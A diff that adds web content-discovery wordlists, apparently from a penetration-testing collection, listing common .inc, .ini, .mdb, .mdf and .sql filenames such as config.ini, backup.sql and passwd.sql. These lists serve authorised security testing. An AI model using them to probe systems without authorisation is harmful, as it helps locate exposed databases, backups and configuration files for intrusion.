|
views_handler_filter_node_tnid.inc
|
||||||
|
views_handler_filter_node_tnid_child.inc
|
||||||
|
views_handler_relationship_translation.inc
|
||||||
|
translation.views.inc
|
||||||
|
views_handler_field_upload_description.inc
|
||||||
|
views_handler_field_upload_fid.inc
|
||||||
|
views_handler_filter_upload_fid.inc
|
||||||
|
upload.views.inc
|
||||||
|
views_handler_argument_user_uid.inc
|
||||||
|
views_handler_argument_users_roles_rid.inc
|
||||||
|
views_handler_field_user.inc
|
||||||
|
views_handler_field_user_link.inc
|
||||||
|
views_handler_field_user_link_delete.inc
|
||||||
|
views_handler_field_user_link_edit.inc
|
||||||
|
views_handler_field_user_mail.inc
|
||||||
|
views_handler_field_user_name.inc
|
||||||
|
views_handler_field_user_picture.inc
|
||||||
|
views_handler_field_user_roles.inc
|
||||||
|
views_handler_filter_user_current.inc
|
||||||
|
views_handler_filter_user_name.inc
|
||||||
|
views_handler_filter_user_roles.inc
|
||||||
|
views_plugin_argument_default_current_user.inc
|
||||||
|
views_plugin_argument_default_user.inc
|
||||||
|
views_plugin_argument_validate_user.inc
|
||||||
|
user.views.inc
|
||||||
|
views.views.inc
|
||||||
|
views_plugin_access.inc
|
||||||
|
views_plugin_access_none.inc
|
||||||
|
views_plugin_access_perm.inc
|
||||||
|
views_plugin_access_role.inc
|
||||||
|
views_plugin_argument_default.inc
|
||||||
|
views_plugin_argument_default_php.inc
|
||||||
|
views_plugin_argument_validate.inc
|
||||||
|
views_plugin_argument_validate_numeric.inc
|
||||||
|
views_plugin_argument_validate_php.inc
|
||||||
|
views_plugin_display.inc
|
||||||
|
views_plugin_display_attachment.inc
|
||||||
|
views_plugin_display_block.inc
|
||||||
|
views_plugin_display_default.inc
|
||||||
|
views_plugin_display_feed.inc
|
||||||
|
views_plugin_display_page.inc
|
||||||
|
views_plugin_row.inc
|
||||||
|
views_plugin_row_fields.inc
|
||||||
|
views_plugin_style.inc
|
||||||
|
views_plugin_style_default.inc
|
||||||
|
views_plugin_style_grid.inc
|
||||||
|
views_plugin_style_list.inc
|
||||||
|
views_plugin_style_rss.inc
|
||||||
|
views_plugin_style_summary.inc
|
||||||
|
views_plugin_style_summary_unformatted.inc
|
||||||
|
views_plugin_style_table.inc
|
||||||
|
funcoes.inc
|
||||||
|
czech.inc
|
||||||
|
italian.inc
|
||||||
|
Converter.inc
|
||||||
|
CHMdefaultConverter.inc
|
||||||
|
HTMLSmartyConverter.inc
|
||||||
|
HTMLframesConverter.inc
|
||||||
|
DescHTML.inc
|
||||||
|
DocBlockTags.inc
|
||||||
|
HighlightParser.inc
|
||||||
|
InlineTags.inc
|
||||||
|
IntermediateParser.inc
|
||||||
|
LinkClasses.inc
|
||||||
|
PackagePageElements.inc
|
||||||
|
ParserData.inc
|
||||||
|
ParserDescCleanup.inc
|
||||||
|
ParserDocBlock.inc
|
||||||
|
ParserElements.inc
|
||||||
|
ProceduralPages.inc
|
||||||
|
TutorialHighlightParser.inc
|
||||||
|
XMLpackagePageParser.inc
|
||||||
|
phpDocumentorTParser.inc
|
||||||
|
phpDocumentorTWordParser.inc
|
||||||
|
phpdoc.inc
|
||||||
|
date.inc
|
||||||
|
clublib.inc
|
||||||
|
clublibsec.inc
|
||||||
|
copyleft.inc
|
||||||
|
dblibsec.inc
|
||||||
|
helpdesk.inc
|
||||||
|
notes.inc
|
||||||
|
2.inc
|
||||||
|
4.inc
|
||||||
|
5.inc
|
||||||
|
3.inc
|
||||||
|
mysql_pear_module.inc
|
||||||
|
companies.inc
|
||||||
|
departments.inc
|
||||||
|
forums.inc
|
||||||
|
history.inc
|
||||||
|
public.inc
|
||||||
|
resources.inc
|
||||||
|
smartsearch.inc
|
||||||
|
styles.inc
|
||||||
|
auxiliary.ErrorHandler.inc
|
||||||
|
error.message.inc
|
||||||
|
onerror.inc
|
||||||
|
oo.ErrorHandler.inc
|
||||||
|
sp.ErrorHandler.inc
|
||||||
|
AccountSectionsDef.inc
|
||||||
|
ConnectDB_mysql.inc
|
||||||
|
ConnectDB_postgres.inc
|
||||||
|
ConstructSQLForUserDefinedSalesReport.inc
|
||||||
|
CSVSalesAnalysis.inc
|
||||||
|
EDIconfig.inc
|
||||||
|
EDIVariableSubstitution.inc
|
||||||
|
FreightCalculation.inc
|
||||||
|
GetPrice.inc
|
||||||
|
GetSalesTransGLCodes.inc
|
||||||
|
GLPostings.inc
|
||||||
|
PDFAgedDebtorsPageHeader.inc
|
||||||
|
PDFAgedSuppliersPageHeader.inc
|
||||||
|
PDFBalanceSheetPageHeader.inc
|
||||||
|
PDFBankingSummaryPageHeader.inc
|
||||||
|
PDFBOMListingPageHeader.inc
|
||||||
|
PDFChequeListingPageHeader.inc
|
||||||
|
PDFCustomerListPageHeader.inc
|
||||||
|
PDFDebtorBalsPageHeader.inc
|
||||||
|
PDFDeliveryDifferencesPageHeader.inc
|
||||||
|
PDFDIFOTPageHeader.inc
|
||||||
|
PDFInventoryPlanPageHeader.inc
|
||||||
|
PDFInventoryValnPageHeader.inc
|
||||||
|
PDFLowGPPageHeader.inc
|
||||||
|
PDFOrderPageHeader.inc
|
||||||
|
PDFOrderPageHeader_generic.inc
|
||||||
|
PDFOrdersInvoicedPageHeader.inc
|
||||||
|
PDFOrderStatusPageHeader.inc
|
||||||
|
PDFOstdgGRNsPageHeader.inc
|
||||||
|
PDFPaymentRunPageHeader.inc
|
||||||
|
PDFPriceListPageHeader.inc
|
||||||
|
PDFProfitAndLossPageHeader.inc
|
||||||
|
PDFQuotationPageHeader.inc
|
||||||
|
PDFSalesAnalPageHeader.inc
|
||||||
|
PDFSalesAnalysis.inc
|
||||||
|
PDFStatementPageHeader.inc
|
||||||
|
PDFStockCheckPageHeader.inc
|
||||||
|
PDFStockComparisonPageHeader.inc
|
||||||
|
PDFStockLocTransferHeader.inc
|
||||||
|
PDFStockNegativesHeader.inc
|
||||||
|
PDFSupplierBalsPageHeader.inc
|
||||||
|
PDFTaxPageHeader.inc
|
||||||
|
PDFTransPageHeader.inc
|
||||||
|
PDFTransPageHeaderPortrait.inc
|
||||||
|
PDFTrialBalancePageHeader.inc
|
||||||
|
PO_PDFOrderPageHeader.inc
|
||||||
|
PO_ReadInOrder.inc
|
||||||
|
SelectOrderItems_IntoCart.inc
|
||||||
|
RCFunctions.inc
|
||||||
|
WriteForm.inc
|
||||||
|
WriteReport.inc
|
||||||
|
login_form.inc
|
||||||
|
application.inc
|
||||||
|
utils.inc
|
||||||
|
model.inc
|
||||||
|
log.inc
|
||||||
|
status.inc
|
||||||
|
db_functions.inc
|
||||||
|
TAG.inc
|
||||||
|
ping.inc
|
||||||
|
security.inc
|
||||||
|
csssyntax.inc
|
||||||
|
db_connect.inc
|
||||||
|
search_form.inc
|
||||||
|
start.inc
|
||||||
|
splitLanguageFiles.inc
|
||||||
|
Input.inc
|
||||||
|
Option.inc
|
||||||
|
globals.inc
|
||||||
|
register.inc
|
||||||
|
img.inc
|
||||||
|
manage.inc
|
||||||
|
connection.inc
|
||||||
|
core.inc
|
||||||
|
entry.inc
|
||||||
|
meta.inc
|
||||||
|
update.inc
|
||||||
|
area.inc
|
||||||
|
map.inc
|
||||||
|
upgrade.inc
|
||||||
|
php-pdb.inc
|
||||||
|
doc.inc
|
||||||
|
pdatoolbox.inc
|
||||||
|
addrbook.inc
|
||||||
|
mobiledb.inc
|
||||||
|
datebook.inc
|
||||||
|
smallbasic.inc
|
||||||
|
gutenberg.inc
|
||||||
|
text.inc
|
||||||
|
default.tpl.inc
|
||||||
|
PRINT.inc
|
||||||
|
playlist.inc
|
||||||
|
patForms.inc
|
||||||
|
phpext.inc
|
||||||
|
location.inc
|
||||||
|
logo.inc
|
||||||
|
words.inc
|
||||||
|
account.inc
|
||||||
|
submit.inc
|
||||||
174
Discovery/SVNDigger/cat/Database/ini.txt
Normal file
174
Discovery/SVNDigger/cat/Database/ini.txt
Normal file
@@ -0,0 +1,174 @@
|
|||||||
|
config.ini
|
||||||
|
php.ini
|
||||||
|
properties.ini
|
||||||
|
propel.ini
|
||||||
|
desktop.ini
|
||||||
|
settings.ini
|
||||||
|
info.ini
|
||||||
|
version.ini
|
||||||
|
phpdoc.ini
|
||||||
|
app.ini
|
||||||
|
application.ini
|
||||||
|
example.ini
|
||||||
|
en.ini
|
||||||
|
my.ini
|
||||||
|
default.ini
|
||||||
|
routes.ini
|
||||||
|
error.ini
|
||||||
|
httpd.ini
|
||||||
|
Picasa.ini
|
||||||
|
test.ini
|
||||||
|
database.ini
|
||||||
|
project.ini
|
||||||
|
en-GB.ini
|
||||||
|
users.ini
|
||||||
|
admin.ini
|
||||||
|
auth.ini
|
||||||
|
boot.ini
|
||||||
|
krumo.ini
|
||||||
|
options.ini
|
||||||
|
BBCodeParser.ini
|
||||||
|
phpDocumentor.ini
|
||||||
|
blog.ini
|
||||||
|
modules.ini
|
||||||
|
setup.ini
|
||||||
|
http.ini
|
||||||
|
en-GB.com_admin.ini
|
||||||
|
en-GB.com_banners.ini
|
||||||
|
en-GB.com_banners.menu.ini
|
||||||
|
en-GB.com_cache.ini
|
||||||
|
en-GB.com_categories.ini
|
||||||
|
en-GB.com_checkin.ini
|
||||||
|
en-GB.com_config.ini
|
||||||
|
en-GB.com_contact.ini
|
||||||
|
en-GB.com_contact.menu.ini
|
||||||
|
en-GB.com_content.ini
|
||||||
|
en-GB.com_cpanel.ini
|
||||||
|
en-GB.com_frontpage.ini
|
||||||
|
en-GB.com_installer.ini
|
||||||
|
en-GB.com_languages.ini
|
||||||
|
en-GB.com_login.ini
|
||||||
|
en-GB.com_massmail.ini
|
||||||
|
en-GB.com_media.ini
|
||||||
|
en-GB.com_menus.ini
|
||||||
|
en-GB.com_menus.menu.ini
|
||||||
|
en-GB.com_messages.ini
|
||||||
|
en-GB.com_modules.ini
|
||||||
|
en-GB.com_newsfeeds.ini
|
||||||
|
en-GB.com_newsfeeds.menu.ini
|
||||||
|
en-GB.com_plugins.ini
|
||||||
|
en-GB.com_poll.ini
|
||||||
|
en-GB.com_poll.menu.ini
|
||||||
|
en-GB.com_search.ini
|
||||||
|
en-GB.com_search.menu.ini
|
||||||
|
en-GB.com_sections.ini
|
||||||
|
en-GB.com_statistics.ini
|
||||||
|
en-GB.com_templates.ini
|
||||||
|
en-GB.com_trash.ini
|
||||||
|
en-GB.com_user.ini
|
||||||
|
en-GB.com_users.ini
|
||||||
|
en-GB.com_weblinks.ini
|
||||||
|
en-GB.com_weblinks.menu.ini
|
||||||
|
en-GB.com_wrapper.ini
|
||||||
|
en-GB.mod_components.ini
|
||||||
|
en-GB.mod_custom.ini
|
||||||
|
en-GB.mod_footer.ini
|
||||||
|
en-GB.mod_latest.ini
|
||||||
|
en-GB.mod_logged.ini
|
||||||
|
en-GB.mod_login.ini
|
||||||
|
en-GB.mod_menu.ini
|
||||||
|
en-GB.mod_online.ini
|
||||||
|
en-GB.mod_popular.ini
|
||||||
|
en-GB.mod_quickicon.ini
|
||||||
|
en-GB.mod_stats.ini
|
||||||
|
en-GB.mod_status.ini
|
||||||
|
en-GB.mod_submenu.ini
|
||||||
|
en-GB.mod_title.ini
|
||||||
|
en-GB.mod_toolbar.ini
|
||||||
|
en-GB.mod_unread.ini
|
||||||
|
en-GB.plg_authentication_example.ini
|
||||||
|
en-GB.plg_authentication_gmail.ini
|
||||||
|
en-GB.plg_authentication_joomla.ini
|
||||||
|
en-GB.plg_authentication_ldap.ini
|
||||||
|
en-GB.plg_authentication_openid.ini
|
||||||
|
en-GB.plg_content_code.ini
|
||||||
|
en-GB.plg_content_emailcloak.ini
|
||||||
|
en-GB.plg_content_geshi.ini
|
||||||
|
en-GB.plg_content_image.ini
|
||||||
|
en-GB.plg_content_loadmodule.ini
|
||||||
|
en-GB.plg_content_pagebreak.ini
|
||||||
|
en-GB.plg_content_pagenavigation.ini
|
||||||
|
en-GB.plg_content_vote.ini
|
||||||
|
en-GB.plg_editors-xtd_image.ini
|
||||||
|
en-GB.plg_editors-xtd_pagebreak.ini
|
||||||
|
en-GB.plg_editors-xtd_readmore.ini
|
||||||
|
en-GB.plg_editors_none.ini
|
||||||
|
en-GB.plg_editors_tinymce.ini
|
||||||
|
en-GB.plg_editors_xstandard.ini
|
||||||
|
en-GB.plg_search_categories.ini
|
||||||
|
en-GB.plg_search_contacts.ini
|
||||||
|
en-GB.plg_search_content.ini
|
||||||
|
en-GB.plg_search_newsfeeds.ini
|
||||||
|
en-GB.plg_search_sections.ini
|
||||||
|
en-GB.plg_search_weblinks.ini
|
||||||
|
en-GB.plg_system_backlink.ini
|
||||||
|
en-GB.plg_system_cache.ini
|
||||||
|
en-GB.plg_system_debug.ini
|
||||||
|
en-GB.plg_system_legacy.ini
|
||||||
|
en-GB.plg_system_sef.ini
|
||||||
|
en-GB.plg_user_joomla.ini
|
||||||
|
en-GB.plg_xmlrpc_blogger.ini
|
||||||
|
en-GB.plg_xmlrpc_joomla.ini
|
||||||
|
en-GB.tpl_beez.ini
|
||||||
|
en-GB.tpl_khepri.ini
|
||||||
|
en-GB.tpl_rhuk_milkyway.ini
|
||||||
|
params.ini
|
||||||
|
en-GB.com_mailto.ini
|
||||||
|
en-GB.mod_archive.ini
|
||||||
|
en-GB.mod_banners.ini
|
||||||
|
en-GB.mod_breadcrumbs.ini
|
||||||
|
en-GB.mod_feed.ini
|
||||||
|
en-GB.mod_latestnews.ini
|
||||||
|
en-GB.mod_mainmenu.ini
|
||||||
|
en-GB.mod_mostread.ini
|
||||||
|
en-GB.mod_newsflash.ini
|
||||||
|
en-GB.mod_poll.ini
|
||||||
|
en-GB.mod_random_image.ini
|
||||||
|
en-GB.mod_related_items.ini
|
||||||
|
en-GB.mod_search.ini
|
||||||
|
en-GB.mod_sections.ini
|
||||||
|
en-GB.mod_syndicate.ini
|
||||||
|
en-GB.mod_whosonline.ini
|
||||||
|
en-GB.mod_wrapper.ini
|
||||||
|
l10n.ini
|
||||||
|
es.ini
|
||||||
|
languages.ini
|
||||||
|
form.ini
|
||||||
|
framework.ini
|
||||||
|
system.ini
|
||||||
|
content.ini
|
||||||
|
news.ini
|
||||||
|
environment.ini
|
||||||
|
my-template.ini
|
||||||
|
route.ini
|
||||||
|
views.help.ini
|
||||||
|
lang.ini
|
||||||
|
demo.ini
|
||||||
|
pear-makedocs.ini
|
||||||
|
testdocbook.ini
|
||||||
|
Menu.ini
|
||||||
|
plugins.ini
|
||||||
|
_desktop.ini
|
||||||
|
engines-list.ini
|
||||||
|
IsapiRewrite4.ini
|
||||||
|
conf.ini
|
||||||
|
core.config.ini
|
||||||
|
ftp.ini
|
||||||
|
example_function_translate.tmpl-default.ini
|
||||||
|
example_function_translate2.tmpl-default.ini
|
||||||
|
example_function_translate.tmpl-de.ini
|
||||||
|
example_function_translate2.tmpl-de.ini
|
||||||
|
danish.ini
|
||||||
|
gungan.ini
|
||||||
|
errors.en.ini
|
||||||
|
skip_version_check.ini
|
||||||
8
Discovery/SVNDigger/cat/Database/mdb.txt
Normal file
8
Discovery/SVNDigger/cat/Database/mdb.txt
Normal file
@@ -0,0 +1,8 @@
|
|||||||
|
data.mdb
|
||||||
|
db.mdb
|
||||||
|
test.mdb
|
||||||
|
DvSQLLOG.mdb
|
||||||
|
IPaddress.mdb
|
||||||
|
Dvboke.mdb
|
||||||
|
db1.mdb
|
||||||
|
database.mdb
|
||||||
3
Discovery/SVNDigger/cat/Database/mdf.txt
Normal file
3
Discovery/SVNDigger/cat/Database/mdf.txt
Normal file
@@ -0,0 +1,3 @@
|
|||||||
|
Database.mdf
|
||||||
|
BookStore.mdf
|
||||||
|
DB.mdf
|
||||||
407
Discovery/SVNDigger/cat/Database/sql.txt
Normal file
407
Discovery/SVNDigger/cat/Database/sql.txt
Normal file
@@ -0,0 +1,407 @@
|
|||||||
|
install.sql
|
||||||
|
schema.sql
|
||||||
|
mysql.sql
|
||||||
|
adodb-sessions.mysql.sql
|
||||||
|
adodb-sessions.oracle.clob.sql
|
||||||
|
adodb-sessions.oracle.sql
|
||||||
|
database.sql
|
||||||
|
sessions.sql
|
||||||
|
tables.sql
|
||||||
|
db_acl.sql
|
||||||
|
db.sql
|
||||||
|
i18n.sql
|
||||||
|
data.sql
|
||||||
|
create.sql
|
||||||
|
pgsql.sql
|
||||||
|
create_tables.sql
|
||||||
|
dump.sql
|
||||||
|
users.sql
|
||||||
|
update.sql
|
||||||
|
test.sql
|
||||||
|
sql.sql
|
||||||
|
lib.model.schema.sql
|
||||||
|
setup.sql
|
||||||
|
drop.sql
|
||||||
|
mysql_schema.sql
|
||||||
|
upgrade.sql
|
||||||
|
structure.sql
|
||||||
|
mssql_schema.sql
|
||||||
|
mysql_basic.sql
|
||||||
|
postgres_schema.sql
|
||||||
|
sqlite.sql
|
||||||
|
base.sql
|
||||||
|
demo.sql
|
||||||
|
sample.sql
|
||||||
|
mssql_basic.sql
|
||||||
|
postgres_basic.sql
|
||||||
|
config.sql
|
||||||
|
blog.sql
|
||||||
|
table.sql
|
||||||
|
create_db.sql
|
||||||
|
create_tables_mysql_4_1_2+.sql
|
||||||
|
upgrade_tables_mysql_4_1_2+.sql
|
||||||
|
session.sql
|
||||||
|
sqlite3.sql
|
||||||
|
insert.sql
|
||||||
|
uninstall.sql
|
||||||
|
oscommerce.sql
|
||||||
|
log.sql
|
||||||
|
user.sql
|
||||||
|
init.sql
|
||||||
|
CreateTables.sql
|
||||||
|
acl.sql
|
||||||
|
plugins.sfGuardPlugin.lib.model.schema.sql
|
||||||
|
localhost.sql
|
||||||
|
accounts.sql
|
||||||
|
script.sql
|
||||||
|
createdb.sql
|
||||||
|
settings.sql
|
||||||
|
SQLServer.sql
|
||||||
|
all.sql
|
||||||
|
BdD.sql
|
||||||
|
samples.sql
|
||||||
|
schema.mysql.sql
|
||||||
|
country.sql
|
||||||
|
sample_data.sql
|
||||||
|
example.sql
|
||||||
|
delete.sql
|
||||||
|
import.sql
|
||||||
|
backup.sql
|
||||||
|
patch-archive-rev_id.sql
|
||||||
|
patch-archive-text_id.sql
|
||||||
|
patch-bot.sql
|
||||||
|
patch-cache.sql
|
||||||
|
patch-categorylinks.sql
|
||||||
|
patch-drop-user_newtalk.sql
|
||||||
|
patch-drop_img_type.sql
|
||||||
|
patch-email-authentication.sql
|
||||||
|
patch-email-notification.sql
|
||||||
|
patch-externallinks.sql
|
||||||
|
patch-filearchive.sql
|
||||||
|
patch-hitcounter.sql
|
||||||
|
patch-image_name_primary.sql
|
||||||
|
patch-image_name_unique.sql
|
||||||
|
patch-img_exif.sql
|
||||||
|
patch-img_media_type.sql
|
||||||
|
patch-img_metadata.sql
|
||||||
|
patch-img_width.sql
|
||||||
|
patch-indexes.sql
|
||||||
|
patch-interwiki-trans.sql
|
||||||
|
patch-interwiki.sql
|
||||||
|
patch-inverse_timestamp.sql
|
||||||
|
patch-ipb_anon_only.sql
|
||||||
|
patch-ipb_expiry.sql
|
||||||
|
patch-ipb_range_start.sql
|
||||||
|
patch-ipblocks.sql
|
||||||
|
patch-job.sql
|
||||||
|
patch-langlinks.sql
|
||||||
|
patch-linkscc-1.3.sql
|
||||||
|
patch-linkscc.sql
|
||||||
|
patch-linktables.sql
|
||||||
|
patch-log_params.sql
|
||||||
|
patch-logging-times-index.sql
|
||||||
|
patch-logging-title.sql
|
||||||
|
patch-logging.sql
|
||||||
|
patch-math.sql
|
||||||
|
patch-mimesearch-indexes.sql
|
||||||
|
patch-objectcache.sql
|
||||||
|
patch-oldestindex.sql
|
||||||
|
patch-page_len.sql
|
||||||
|
patch-page_no_title_convert.sql
|
||||||
|
patch-pagelinks.sql
|
||||||
|
patch-parsercache.sql
|
||||||
|
patch-profiling.sql
|
||||||
|
patch-querycache.sql
|
||||||
|
patch-querycacheinfo.sql
|
||||||
|
patch-random-dateindex.sql
|
||||||
|
patch-rc-newindex.sql
|
||||||
|
patch-rc-patrol.sql
|
||||||
|
patch-rc_id.sql
|
||||||
|
patch-rc_ip.sql
|
||||||
|
patch-rc_type.sql
|
||||||
|
patch-recentchanges-utindex.sql
|
||||||
|
patch-rename-user_groups-and_rights.sql
|
||||||
|
patch-restructure.sql
|
||||||
|
patch-rev_deleted.sql
|
||||||
|
patch-rev_text_id.sql
|
||||||
|
patch-searchindex.sql
|
||||||
|
patch-ss_images.sql
|
||||||
|
patch-ss_total_articles.sql
|
||||||
|
patch-templatelinks.sql
|
||||||
|
patch-trackbacks.sql
|
||||||
|
patch-transcache.sql
|
||||||
|
patch-user-realname.sql
|
||||||
|
patch-user_email_token.sql
|
||||||
|
patch-user_groups.sql
|
||||||
|
patch-user_nameindex.sql
|
||||||
|
patch-user_registration.sql
|
||||||
|
patch-user_rights.sql
|
||||||
|
patch-user_token.sql
|
||||||
|
patch-userindex.sql
|
||||||
|
patch-userlevels.sql
|
||||||
|
patch-usernewtalk.sql
|
||||||
|
patch-val_ip.sql
|
||||||
|
patch-validate.sql
|
||||||
|
patch-watchlist-null.sql
|
||||||
|
patch-watchlist.sql
|
||||||
|
interwiki.sql
|
||||||
|
blobs.sql
|
||||||
|
wikipedia-interwiki.sql
|
||||||
|
wiktionary-interwiki.sql
|
||||||
|
mysql.lang.data.sql
|
||||||
|
mysql.data.sql
|
||||||
|
calendar.sql
|
||||||
|
new.sql
|
||||||
|
account.sql
|
||||||
|
query.sql
|
||||||
|
mp3.sql
|
||||||
|
members.sql
|
||||||
|
templates.sql
|
||||||
|
postgresql.sql
|
||||||
|
countries.sql
|
||||||
|
alter.sql
|
||||||
|
updates.sql
|
||||||
|
postgres.sql
|
||||||
|
Oracle.sql
|
||||||
|
001_InitialSchema.sql
|
||||||
|
0001_AddDatabaseUser.sql
|
||||||
|
DatabaseObjectOptions.sql
|
||||||
|
Permissions.sql
|
||||||
|
RoleMemberships.sql
|
||||||
|
RulesAndDefaults.sql
|
||||||
|
Script.PostDeployment.sql
|
||||||
|
Signatures.sql
|
||||||
|
CustomErrors.sql
|
||||||
|
EncryptionKeysAndCertificates.sql
|
||||||
|
LinkedServers.sql
|
||||||
|
Logins.sql
|
||||||
|
Script.PreDeployment.sql
|
||||||
|
new_install.sql
|
||||||
|
Logging.sql
|
||||||
|
categories.sql
|
||||||
|
nuke.sql
|
||||||
|
database_mysql.sql
|
||||||
|
auth.sql
|
||||||
|
db-schema.sql
|
||||||
|
comments.sql
|
||||||
|
blocks.sql
|
||||||
|
insert_data.sql
|
||||||
|
taxonomy.sql
|
||||||
|
dbscript.sql
|
||||||
|
schema.sqlite.sql
|
||||||
|
model.sql
|
||||||
|
phpcms.sql
|
||||||
|
db_schema.sql
|
||||||
|
testData.sql
|
||||||
|
data_mysql.sql
|
||||||
|
access.sql
|
||||||
|
examples.sql
|
||||||
|
patch.sql
|
||||||
|
mysql_myisam.sql
|
||||||
|
mysql_innodb.sql
|
||||||
|
sql_server.sql
|
||||||
|
patch-backlinkindexes.sql
|
||||||
|
patch-ipb_optional_autoblock.sql
|
||||||
|
patch-querycachetwo.sql
|
||||||
|
patch-rc_len.sql
|
||||||
|
patch-rc_user_text-index.sql
|
||||||
|
patch-redirect.sql
|
||||||
|
patch-user_editcount.sql
|
||||||
|
patch-user_newpass_time.sql
|
||||||
|
testRunner.sql
|
||||||
|
mysql.structure.sql
|
||||||
|
INVENTORY.sql
|
||||||
|
create-data.sql
|
||||||
|
create-schema.sql
|
||||||
|
table_schema.sql
|
||||||
|
drop_table.sql
|
||||||
|
joomla.sql
|
||||||
|
migrate_Mambo4523_to_Joomla_100.sql
|
||||||
|
Agent.sql
|
||||||
|
AuthN_AgentTokenMapping.sql
|
||||||
|
AuthN_Example_Authentication.sql
|
||||||
|
AuthN_Visitor_Authentication.sql
|
||||||
|
AuthZ.sql
|
||||||
|
AuthZ2.sql
|
||||||
|
CourseManagement.sql
|
||||||
|
DataManager.sql
|
||||||
|
DigitalRepository.sql
|
||||||
|
GUI.sql
|
||||||
|
Grading.sql
|
||||||
|
Hierarchy.sql
|
||||||
|
Id.sql
|
||||||
|
Scheduling.sql
|
||||||
|
Sets.sql
|
||||||
|
Shared.sql
|
||||||
|
Tagging.sql
|
||||||
|
001_Shared.sql
|
||||||
|
002_Agent.sql
|
||||||
|
003_AuthN_AgentTokenMapping.sql
|
||||||
|
004_AuthN_Example_Authentication.sql
|
||||||
|
004_AuthN_Visitor_Authentication.sql
|
||||||
|
005_AuthZ.sql
|
||||||
|
006_Id.sql
|
||||||
|
007_Hierarchy.sql
|
||||||
|
008_Sets.sql
|
||||||
|
009_Logging.sql
|
||||||
|
010_DataManager.sql
|
||||||
|
011_DigitalRepository.sql
|
||||||
|
012_Tagging.sql
|
||||||
|
013_Scheduling.sql
|
||||||
|
014_Grading.sql
|
||||||
|
015_CourseManagement.sql
|
||||||
|
testB.sql
|
||||||
|
test_PostgreSQL.sql
|
||||||
|
doboHarmoniTest.sql
|
||||||
|
forum.sql
|
||||||
|
menu.sql
|
||||||
|
com.sql
|
||||||
|
member.sql
|
||||||
|
world.sql
|
||||||
|
sampledata.sql
|
||||||
|
u.sql
|
||||||
|
db_mysql.sql
|
||||||
|
databasefat.sql
|
||||||
|
groups.sql
|
||||||
|
init_db.sql
|
||||||
|
mysql-reset.sql
|
||||||
|
time-tracker-mysql.sql
|
||||||
|
upgrade_101_to_102.sql
|
||||||
|
upgrade_102_to_20alpha.sql
|
||||||
|
upgrade_201_to_202.sql
|
||||||
|
upgrade_204_to_21rc1.sql
|
||||||
|
upgrade_20_to_201.sql
|
||||||
|
upgrade_20alpha_to_20beta.sql
|
||||||
|
upgrade_20beta_to_20.sql
|
||||||
|
upgrade_21_to_211.sql
|
||||||
|
upgrade_21rc1_to_21rc2.sql
|
||||||
|
upgrade_21rc2_to_21.sql
|
||||||
|
upgrade_latest.sql
|
||||||
|
moods.sql
|
||||||
|
dvd.sql
|
||||||
|
intrusions.sql
|
||||||
|
framework.sql
|
||||||
|
upgrade2.7-2.8.sql
|
||||||
|
upgrade2.8-2.9.sql
|
||||||
|
upgrade2.9-2.9a.sql
|
||||||
|
upgrade2.9a-2.9b.sql
|
||||||
|
upgrade2.9b-3.0.sql
|
||||||
|
upgrade3.00-3.01.sql
|
||||||
|
upgrade3.01-3.02.sql
|
||||||
|
upgrade3.02-3.03.sql
|
||||||
|
upgrade3.03-3.04.sql
|
||||||
|
upgrade3.04-3.05.sql
|
||||||
|
upgrade3.05-3.06.sql
|
||||||
|
upgrade3.06-3.07.sql
|
||||||
|
mysql_test_db.sql
|
||||||
|
optimize.sql
|
||||||
|
newsletter.sql
|
||||||
|
grid-demo.sql
|
||||||
|
crt_db.sql
|
||||||
|
state.sql
|
||||||
|
firebird_schema.sql
|
||||||
|
oracle_schema.sql
|
||||||
|
schema_data.sql
|
||||||
|
sqlite_schema.sql
|
||||||
|
mysql50.sql
|
||||||
|
mysql41.sql
|
||||||
|
mysqldump.sql
|
||||||
|
cms.sql
|
||||||
|
passwd.sql
|
||||||
|
todo.sql
|
||||||
|
schema_mysql.sql
|
||||||
|
tabledefs.sql
|
||||||
|
content.sql
|
||||||
|
teardown.sql
|
||||||
|
data_1.sql
|
||||||
|
data_10.sql
|
||||||
|
data_11.sql
|
||||||
|
data_12.sql
|
||||||
|
data_13.sql
|
||||||
|
data_14.sql
|
||||||
|
data_15.sql
|
||||||
|
data_16.sql
|
||||||
|
data_17.sql
|
||||||
|
data_18.sql
|
||||||
|
data_2.sql
|
||||||
|
data_3.sql
|
||||||
|
data_4.sql
|
||||||
|
data_5.sql
|
||||||
|
data_6.sql
|
||||||
|
data_7.sql
|
||||||
|
data_8.sql
|
||||||
|
data_9.sql
|
||||||
|
Goold.sql
|
||||||
|
Nerastus.sql
|
||||||
|
bobo.sql
|
||||||
|
dungeon.sql
|
||||||
|
rovine.sql
|
||||||
|
willem.sql
|
||||||
|
functions.sql
|
||||||
|
patch-rename-group.sql
|
||||||
|
patch-userlevels-defaultgroups.sql
|
||||||
|
patch-userlevels-rights.sql
|
||||||
|
patch-usernewtalk2.sql
|
||||||
|
build-intl-wiki.sql
|
||||||
|
changeuser.sql
|
||||||
|
login.sql
|
||||||
|
testtbl.sql
|
||||||
|
guestbook.sql
|
||||||
|
sql_data.sql
|
||||||
|
mssql.sql
|
||||||
|
SQL2000.sql
|
||||||
|
theme.sql
|
||||||
|
001_CreateDeploymentTable.sql
|
||||||
|
002_AddResultAndOutputColumns.sql
|
||||||
|
mysql_install.sql
|
||||||
|
AddMissingPrimaryKeys.sql
|
||||||
|
RenameForeignKeys.sql
|
||||||
|
0.1.0.sql
|
||||||
|
0.1.1.sql
|
||||||
|
0.1.2.sql
|
||||||
|
mysql_data.sql
|
||||||
|
mysql_structure.sql
|
||||||
|
export.sql
|
||||||
|
CreateDatabase.sql
|
||||||
|
multinews.sql
|
||||||
|
VW_CONTAINER_LABEL.sql
|
||||||
|
security.sql
|
||||||
|
staff.sql
|
||||||
|
cd.sql
|
||||||
|
adminuser.sql
|
||||||
|
DropTables.sql
|
||||||
|
Views.sql
|
||||||
|
Create-Tables.sql
|
||||||
|
phpcounter.sql
|
||||||
|
images.sql
|
||||||
|
indexes.sql
|
||||||
|
db_install.sql
|
||||||
|
sqlite.initial.sql
|
||||||
|
mysql.initial.sql
|
||||||
|
setting.sql
|
||||||
|
dbtest1.sql
|
||||||
|
dbtest2.sql
|
||||||
|
example_storage_db.sql
|
||||||
|
Clear.sql
|
||||||
|
new_game.sql
|
||||||
|
new_server.sql
|
||||||
|
mysql_db_install.sql
|
||||||
|
mysql_db_remove.sql
|
||||||
|
pgsql_db_remove.sql
|
||||||
|
pgsql_db_install.sql
|
||||||
|
stylesheets.sql
|
||||||
|
mysql40.sql
|
||||||
|
administration.sql
|
||||||
|
administration_profile.sql
|
||||||
|
currency.sql
|
||||||
|
